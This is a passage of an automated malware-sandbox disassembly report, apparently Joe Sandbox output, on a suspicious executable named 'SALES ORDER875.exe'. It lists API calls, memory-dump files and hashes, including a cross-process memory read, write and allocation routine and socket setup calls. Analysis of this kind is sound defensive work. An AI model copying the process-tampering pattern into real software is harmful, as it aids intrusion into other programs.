                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD764
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD776
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD788
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD79A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 72a6805f5bda59d6ce0e39c6294ac4ae685fbe9bdb961d887ff6e191ac6e8a40
                                                                                                                                                                                    • Instruction ID: 7baf389fd736b211e84e5701b61f6926a5e2553fa0f6482aedc30e1003af93ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72a6805f5bda59d6ce0e39c6294ac4ae685fbe9bdb961d887ff6e191ac6e8a40
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F03C72501204BB8662EB64F9C6CD677DDBB063187990C15F248DB901DB30FC808668
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 003E5C58
                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 003E5C6F
                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 003E5C87
                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 003E5CA3
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 003E5CBD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                    • Opcode ID: 3799536b6ddc077bf8a356be3c86fc0f2a3e21a195bb0bd5c6e07a82952e70c1
                                                                                                                                                                                    • Instruction ID: 8e868f9f93dd835b4c85498b5b992b471b6221109221abe5af55c70a9732137c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3799536b6ddc077bf8a356be3c86fc0f2a3e21a195bb0bd5c6e07a82952e70c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7701A430540B54ABEB225B11DD9EFE677B8BF04B09F004669B683A14E1DBF0A984CB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 003B22BE
                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • _free.LIBCMT ref: 003B22D0
                                                                                                                                                                                    • _free.LIBCMT ref: 003B22E3
                                                                                                                                                                                    • _free.LIBCMT ref: 003B22F4
                                                                                                                                                                                    • _free.LIBCMT ref: 003B2305
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 04fdd4d6be1467520138cb94c6a48f21fd579b864ea47c53b31959486d4d157f
                                                                                                                                                                                    • Instruction ID: dc182cbd73fd5b5cde764c3688d03ccec93adb07e9845e7838c08cf9278830c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04fdd4d6be1467520138cb94c6a48f21fd579b864ea47c53b31959486d4d157f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0B4794013109B9693BF54BC4198A3B64F71A757B050B67F508DA672C73184219FEC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndPath.GDI32(?), ref: 003995D4
                                                                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,003D71F7,00000000,?,?,?), ref: 003995F0
                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00399603
                                                                                                                                                                                    • DeleteObject.GDI32 ref: 00399616
                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00399631
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                                                                    • Opcode ID: 5314e2e77e2d4f4aae7c68c2ceb4f1e79b6bb90af96bcb9fb07e0798ff423643
                                                                                                                                                                                    • Instruction ID: 08d4d666ced77326fead1f18125436d888a9baa967763ad5d18e1e4864b332bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5314e2e77e2d4f4aae7c68c2ceb4f1e79b6bb90af96bcb9fb07e0798ff423643
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F037B0046308EBDB225F69ED5CBA93F65AB05333F058239F465990F2C7348991DF68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                    • Opcode ID: c79947c0f8bc16913e6411c059ed552d2cb94c26dcc6f8db53c6979a3aff78ee
                                                                                                                                                                                    • Instruction ID: 5e7eac4f67a979d0e668cb6a08401094360f2d55e6b4133f2d84e038d451924c
                                                                                                                                                                                    • Opcode Fuzzy Hash: c79947c0f8bc16913e6411c059ed552d2cb94c26dcc6f8db53c6979a3aff78ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FD10535900205CADB2B9F68C865BFEB7F4EF06308FA90159E7059BE50E3759D80CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003A0242: EnterCriticalSection.KERNEL32(0045070C,00451884,?,?,0039198B,00452518,?,?,?,003812F9,00000000), ref: 003A024D
                                                                                                                                                                                      • Part of subcall function 003A0242: LeaveCriticalSection.KERNEL32(0045070C,?,0039198B,00452518,?,?,?,003812F9,00000000), ref: 003A028A
                                                                                                                                                                                      • Part of subcall function 003A00A3: __onexit.LIBCMT ref: 003A00A9
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00406238
                                                                                                                                                                                      • Part of subcall function 003A01F8: EnterCriticalSection.KERNEL32(0045070C,?,?,00398747,00452514), ref: 003A0202
                                                                                                                                                                                      • Part of subcall function 003A01F8: LeaveCriticalSection.KERNEL32(0045070C,?,00398747,00452514), ref: 003A0235
                                                                                                                                                                                      • Part of subcall function 003F359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003F35E4
                                                                                                                                                                                      • Part of subcall function 003F359C: LoadStringW.USER32(00452390,?,00000FFF,?), ref: 003F360A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                                                                    • String ID: x#E$x#E$x#E
                                                                                                                                                                                    • API String ID: 1072379062-1630825855
                                                                                                                                                                                    • Opcode ID: 89930e34807e3dd0fd8fe47cc62364e79761f467c2fe24e764de3298ef3cb97d
                                                                                                                                                                                    • Instruction ID: c2e6b9e9ab8a31b9c8ed123fb582860ab2b73dabd08c1663bb400d450081d40b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89930e34807e3dd0fd8fe47cc62364e79761f467c2fe24e764de3298ef3cb97d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC1A171A00205AFCB15EF58C890EBEB7B9EF49300F15806AF906AB291DB74ED55CB94
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: JO8
                                                                                                                                                                                    • API String ID: 0-3719248464
                                                                                                                                                                                    • Opcode ID: a5d790775b9a0e4be22e91814c30e13a29ad623c7383abce41f5d222c6482f47
                                                                                                                                                                                    • Instruction ID: 4eec636d975fecff15bf262cb797a386d935f26b4dda687560a9b6b1390c3ad5
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5d790775b9a0e4be22e91814c30e13a29ad623c7383abce41f5d222c6482f47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B51E075D006099FCB23EFA4C845FEEBFB9EF06318F150119F601ABA92D7319A018B61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 003B8B6E
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 003B8B7A
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003B8B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                                                                                    • String ID: .:
                                                                                                                                                                                    • API String ID: 2434981716-1873446780
                                                                                                                                                                                    • Opcode ID: 17e2c71e5f37e2a45481d3a86232c3a741dac9d582c8a911c5318bde61b4a941
                                                                                                                                                                                    • Instruction ID: 9761be78c76c6a6aee3c369f75479167228b9fbbecf9f4a459a9f25b9380101a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17e2c71e5f37e2a45481d3a86232c3a741dac9d582c8a911c5318bde61b4a941
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75416B75A04145AFD726DF28CC80AF97FADDB85308B2885A9E5848BD42DE31CC02C794
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E21D0,?,?,00000034,00000800,?,00000034), ref: 003EB42D
                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003E2760
                                                                                                                                                                                      • Part of subcall function 003EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 003EB3F8
                                                                                                                                                                                      • Part of subcall function 003EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 003EB355
                                                                                                                                                                                      • Part of subcall function 003EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003E2194,00000034,?,?,00001004,00000000,00000000), ref: 003EB365
                                                                                                                                                                                      • Part of subcall function 003EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003E2194,00000034,?,?,00001004,00000000,00000000), ref: 003EB37B
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E27CD
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E281A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                    • Opcode ID: 3cff18f246af838df4afe219afd79771a8ae015e407cb0fbfb844c08f8980cea
                                                                                                                                                                                    • Instruction ID: a36c73549a4ce609a84a8884cf396b668f789c8f919a0f1efb11aa4dac979a78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cff18f246af838df4afe219afd79771a8ae015e407cb0fbfb844c08f8980cea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02414F76900228AFDB12DFA5CD82BDEBBB8EF05300F104195FA55B7181DB706E45CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SALES ORDER875.exe,00000104), ref: 003B1769
                                                                                                                                                                                    • _free.LIBCMT ref: 003B1834
                                                                                                                                                                                    • _free.LIBCMT ref: 003B183E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\SALES ORDER875.exe
                                                                                                                                                                                    • API String ID: 2506810119-5433118
                                                                                                                                                                                    • Opcode ID: 89b5a880bc87478dd134c2e457ac074118335225f921ee8cd78db708189b98e0
                                                                                                                                                                                    • Instruction ID: cdffca32f976b7295b65bda9d66c608c73e2a6bb99fca09a84dbb28098e97d75
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89b5a880bc87478dd134c2e457ac074118335225f921ee8cd78db708189b98e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431A075A00208AFDB22DF99D886DDEBBFCEB85314F5041A6FA04DB611DB708E40CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003EC306
                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 003EC34C
                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00451990,016D6668), ref: 003EC395
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                    • Opcode ID: e785c2b7c2f87bd1603475d18c6615d2572aac3f8b6db019ee877d0062275764
                                                                                                                                                                                    • Instruction ID: 3100a6f36c2278b199ef70f4d91dfab660eb09046bcabbd84501ad4a15adbab1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e785c2b7c2f87bd1603475d18c6615d2572aac3f8b6db019ee877d0062275764
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8841BF352043919FD722DF26D884F5EBBE8AB85310F049B1DF8A59B2D1C734E805CB62
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041CC08,00000000,?,?,?,?), ref: 004144AA
                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 004144C7
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004144D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                    • Opcode ID: ff835541bd34e95bee5b5d404ee48677f0a7f56a7f152c409ff3e963374a36d1
                                                                                                                                                                                    • Instruction ID: 6d3c84bd77f210f63c598e5bca44d57769601a543c6d0062c27081481f608fcc
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff835541bd34e95bee5b5d404ee48677f0a7f56a7f152c409ff3e963374a36d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: D831AD72200605AFDF219E38DC45BEB7BA9EB48334F204326F975922E0D778EC919B54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SysReAllocString.OLEAUT32(?,?), ref: 003E6EED
                                                                                                                                                                                    • VariantCopyInd.OLEAUT32(?,?), ref: 003E6F08
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003E6F12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$AllocClearCopyString
                                                                                                                                                                                    • String ID: *j>
                                                                                                                                                                                    • API String ID: 2173805711-2498266274
                                                                                                                                                                                    • Opcode ID: a1b7ddf1cb5118628eb8b18650037c82932ed33e4840511b59d6ca242fafc5b5
                                                                                                                                                                                    • Instruction ID: a180841aebcceeaabccb252b9dda849cadf0f010857a7cfdcdb287818b6ff47c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1b7ddf1cb5118628eb8b18650037c82932ed33e4840511b59d6ca242fafc5b5
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE3190716042A5DBCB06AF65E8929FD7779FFA5340B1005A8F8024F2E1CB309922DB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00403077,?,?), ref: 00403378
                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 0040307A
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040309B
                                                                                                                                                                                    • htons.WSOCK32(00000000), ref: 00403106
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
